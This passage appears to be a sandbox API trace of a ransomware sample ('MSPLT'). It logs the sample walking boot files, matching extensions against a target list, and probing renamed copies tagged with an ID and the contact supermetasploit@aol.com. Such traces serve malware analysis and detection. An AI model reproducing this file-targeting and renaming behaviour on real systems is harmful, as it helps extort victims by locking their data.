lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.507] lstrlenW (lpString=".1cd") returned 4 [0283.507] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.507] lstrlenW (lpString=".jpg") returned 4 [0283.507] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.507] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.507] lstrlenW (lpString=".doc") returned 4 [0283.507] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0283.507] lstrlenW (lpString=".docx") returned 5 [0283.507] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0283.507] lstrlenW (lpString=".pdf") returned 4 [0283.508] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString=".xls") returned 4 [0283.508] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString=".xlsx") returned 5 [0283.508] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0283.508] lstrlenW (lpString=".ppt") returned 4 [0283.508] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.508] lstrlenW (lpString=".zip") returned 4 [0283.508] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString=".rar") returned 4 [0283.508] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString=".bz2") returned 4 [0283.508] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString=".7z") returned 3 [0283.508] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0283.508] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.508] lstrlenW (lpString=".dbf") returned 4 [0283.508] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.508] lstrlenW (lpString=".1cd") returned 4 [0283.508] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0283.508] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0283.508] lstrlenW (lpString=".jpg") returned 4 [0283.508] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0283.508] Sleep (dwMilliseconds=0x64) [0283.792] Sleep (dwMilliseconds=0x64) [0284.038] Sleep (dwMilliseconds=0x64) [0284.331] Sleep (dwMilliseconds=0x64) [0284.604] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0284.604] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.604] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0284.617] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=77664) returned 1 [0284.617] CloseHandle (hObject=0x37c) returned 1 [0284.617] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0284.617] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0284.617] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.618] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.618] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.618] lstrlenW (lpString=".doc") returned 4 [0284.618] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.618] lstrlenW (lpString=".docx") returned 5 [0284.618] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.618] lstrlenW (lpString=".pdf") returned 4 [0284.618] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.618] lstrlenW (lpString=".xls") returned 4 [0284.618] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.618] lstrlenW (lpString=".xlsx") returned 5 [0284.618] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.618] lstrlenW (lpString=".ppt") returned 4 [0284.618] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.618] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.618] lstrlenW (lpString=".zip") returned 4 [0284.618] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.618] lstrlenW (lpString=".rar") returned 4 [0284.618] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.618] lstrlenW (lpString=".bz2") returned 4 [0284.618] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.618] lstrlenW (lpString=".7z") returned 3 [0284.618] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.618] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.618] lstrlenW (lpString=".dbf") returned 4 [0284.618] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.619] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.619] lstrlenW (lpString=".1cd") returned 4 [0284.619] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.619] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.619] lstrlenW (lpString=".jpg") returned 4 [0284.619] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.619] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.619] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.619] lstrlenW (lpString=".doc") returned 4 [0284.619] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.619] lstrlenW (lpString=".docx") returned 5 [0284.619] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.619] lstrlenW (lpString=".pdf") returned 4 [0284.619] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.619] lstrlenW (lpString=".xls") returned 4 [0284.619] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.619] lstrlenW (lpString=".xlsx") returned 5 [0284.619] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.619] lstrlenW (lpString=".ppt") returned 4 [0284.619] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.619] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.619] lstrlenW (lpString=".zip") returned 4 [0284.619] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.619] lstrlenW (lpString=".rar") returned 4 [0284.619] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.619] lstrlenW (lpString=".bz2") returned 4 [0284.619] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.619] lstrlenW (lpString=".7z") returned 3 [0284.620] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.620] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.620] lstrlenW (lpString=".dbf") returned 4 [0284.620] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.620] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.620] lstrlenW (lpString=".1cd") returned 4 [0284.620] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.620] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0284.620] lstrlenW (lpString=".jpg") returned 4 [0284.620] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.620] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0284.620] lstrlenW (lpString="bootspaces.dll") returned 14 [0284.620] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0284.626] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=95648) returned 1 [0284.626] CloseHandle (hObject=0x348) returned 1 [0284.626] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0284.626] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bootspaces.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0284.626] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.626] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.626] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.626] lstrlenW (lpString=".doc") returned 4 [0284.626] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0284.626] lstrlenW (lpString=".docx") returned 5 [0284.626] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0284.627] lstrlenW (lpString=".pdf") returned 4 [0284.627] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0284.627] lstrlenW (lpString=".xls") returned 4 [0284.627] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0284.627] lstrlenW (lpString=".xlsx") returned 5 [0284.627] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0284.627] lstrlenW (lpString=".ppt") returned 4 [0284.627] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0284.627] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.627] lstrlenW (lpString=".zip") returned 4 [0284.627] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0284.627] lstrlenW (lpString=".rar") returned 4 [0284.627] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0284.627] lstrlenW (lpString=".bz2") returned 4 [0284.627] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0284.627] lstrlenW (lpString=".7z") returned 3 [0284.627] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0284.627] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.627] lstrlenW (lpString=".dbf") returned 4 [0284.627] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0284.627] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.627] lstrlenW (lpString=".1cd") returned 4 [0284.627] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0284.627] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.627] lstrlenW (lpString=".jpg") returned 4 [0284.627] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0284.627] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.628] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.628] lstrlenW (lpString=".doc") returned 4 [0284.628] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0284.628] lstrlenW (lpString=".docx") returned 5 [0284.628] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0284.628] lstrlenW (lpString=".pdf") returned 4 [0284.628] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0284.628] lstrlenW (lpString=".xls") returned 4 [0284.628] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0284.628] lstrlenW (lpString=".xlsx") returned 5 [0284.628] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0284.628] lstrlenW (lpString=".ppt") returned 4 [0284.628] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0284.628] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.628] lstrlenW (lpString=".zip") returned 4 [0284.628] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0284.628] lstrlenW (lpString=".rar") returned 4 [0284.628] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0284.628] lstrlenW (lpString=".bz2") returned 4 [0284.628] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0284.628] lstrlenW (lpString=".7z") returned 3 [0284.628] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0284.628] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.628] lstrlenW (lpString=".dbf") returned 4 [0284.628] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0284.629] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.629] lstrlenW (lpString=".1cd") returned 4 [0284.629] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0284.629] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0284.629] lstrlenW (lpString=".jpg") returned 4 [0284.629] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0284.629] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0284.629] lstrlenW (lpString="bootvhd.dll") returned 11 [0284.629] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0284.630] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=99744) returned 1 [0284.630] CloseHandle (hObject=0x348) returned 1 [0284.630] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0284.630] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\bootvhd.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0284.630] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.630] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.630] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.630] lstrlenW (lpString=".doc") returned 4 [0284.630] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0284.630] lstrlenW (lpString=".docx") returned 5 [0284.630] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0284.630] lstrlenW (lpString=".pdf") returned 4 [0284.630] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0284.630] lstrlenW (lpString=".xls") returned 4 [0284.630] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0284.631] lstrlenW (lpString=".xlsx") returned 5 [0284.631] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0284.631] lstrlenW (lpString=".ppt") returned 4 [0284.631] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0284.631] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.631] lstrlenW (lpString=".zip") returned 4 [0284.631] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0284.631] lstrlenW (lpString=".rar") returned 4 [0284.631] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0284.631] lstrlenW (lpString=".bz2") returned 4 [0284.631] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0284.631] lstrlenW (lpString=".7z") returned 3 [0284.631] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0284.631] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.631] lstrlenW (lpString=".dbf") returned 4 [0284.631] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0284.631] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.631] lstrlenW (lpString=".1cd") returned 4 [0284.631] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0284.631] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.632] lstrlenW (lpString=".jpg") returned 4 [0284.632] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0284.632] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.632] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.632] lstrlenW (lpString=".doc") returned 4 [0284.632] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0284.632] lstrlenW (lpString=".docx") returned 5 [0284.632] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0284.632] lstrlenW (lpString=".pdf") returned 4 [0284.632] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0284.632] lstrlenW (lpString=".xls") returned 4 [0284.632] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0284.632] lstrlenW (lpString=".xlsx") returned 5 [0284.632] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0284.632] lstrlenW (lpString=".ppt") returned 4 [0284.632] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0284.632] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.632] lstrlenW (lpString=".zip") returned 4 [0284.633] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0284.633] lstrlenW (lpString=".rar") returned 4 [0284.633] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0284.633] lstrlenW (lpString=".bz2") returned 4 [0284.633] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0284.633] lstrlenW (lpString=".7z") returned 3 [0284.633] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0284.633] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.633] lstrlenW (lpString=".dbf") returned 4 [0284.633] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0284.633] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.633] lstrlenW (lpString=".1cd") returned 4 [0284.633] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0284.633] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0284.633] lstrlenW (lpString=".jpg") returned 4 [0284.633] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0284.633] Sleep (dwMilliseconds=0x64) [0284.929] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0284.929] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.929] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0285.039] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=79200) returned 1 [0285.039] CloseHandle (hObject=0x3b0) returned 1 [0285.039] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0285.039] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.039] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.039] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.039] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.039] lstrlenW (lpString=".doc") returned 4 [0285.039] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.039] lstrlenW (lpString=".docx") returned 5 [0285.039] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.069] lstrlenW (lpString=".pdf") returned 4 [0285.069] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.069] lstrlenW (lpString=".xls") returned 4 [0285.069] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.069] lstrlenW (lpString=".xlsx") returned 5 [0285.069] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.069] lstrlenW (lpString=".ppt") returned 4 [0285.069] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.069] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.069] lstrlenW (lpString=".zip") returned 4 [0285.069] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.069] lstrlenW (lpString=".rar") returned 4 [0285.069] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.069] lstrlenW (lpString=".bz2") returned 4 [0285.069] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.069] lstrlenW (lpString=".7z") returned 3 [0285.069] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.069] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.069] lstrlenW (lpString=".dbf") returned 4 [0285.070] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.070] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.070] lstrlenW (lpString=".1cd") returned 4 [0285.070] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.070] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.070] lstrlenW (lpString=".jpg") returned 4 [0285.070] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.070] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.070] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.070] lstrlenW (lpString=".doc") returned 4 [0285.070] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.070] lstrlenW (lpString=".docx") returned 5 [0285.070] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.070] lstrlenW (lpString=".pdf") returned 4 [0285.070] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.070] lstrlenW (lpString=".xls") returned 4 [0285.070] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.070] lstrlenW (lpString=".xlsx") returned 5 [0285.070] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.070] lstrlenW (lpString=".ppt") returned 4 [0285.070] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.070] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.070] lstrlenW (lpString=".zip") returned 4 [0285.070] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.070] lstrlenW (lpString=".rar") returned 4 [0285.070] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.070] lstrlenW (lpString=".bz2") returned 4 [0285.071] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.071] lstrlenW (lpString=".7z") returned 3 [0285.071] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.071] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.071] lstrlenW (lpString=".dbf") returned 4 [0285.071] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.071] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.071] lstrlenW (lpString=".1cd") returned 4 [0285.071] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.071] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0285.071] lstrlenW (lpString=".jpg") returned 4 [0285.071] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.071] Sleep (dwMilliseconds=0x64) [0285.384] Sleep (dwMilliseconds=0x64) [0285.702] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.702] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.702] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0285.720] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=76640) returned 1 [0285.720] CloseHandle (hObject=0x3b0) returned 1 [0285.721] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0285.721] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.729] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.730] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.730] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.730] lstrlenW (lpString=".doc") returned 4 [0285.730] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.730] lstrlenW (lpString=".docx") returned 5 [0285.730] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.730] lstrlenW (lpString=".pdf") returned 4 [0285.730] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.730] lstrlenW (lpString=".xls") returned 4 [0285.730] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.730] lstrlenW (lpString=".xlsx") returned 5 [0285.730] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.730] lstrlenW (lpString=".ppt") returned 4 [0285.730] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.731] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.731] lstrlenW (lpString=".zip") returned 4 [0285.731] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.731] lstrlenW (lpString=".rar") returned 4 [0285.731] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.731] lstrlenW (lpString=".bz2") returned 4 [0285.731] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.731] lstrlenW (lpString=".7z") returned 3 [0285.731] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.731] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.731] lstrlenW (lpString=".dbf") returned 4 [0285.731] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.731] lstrlenW 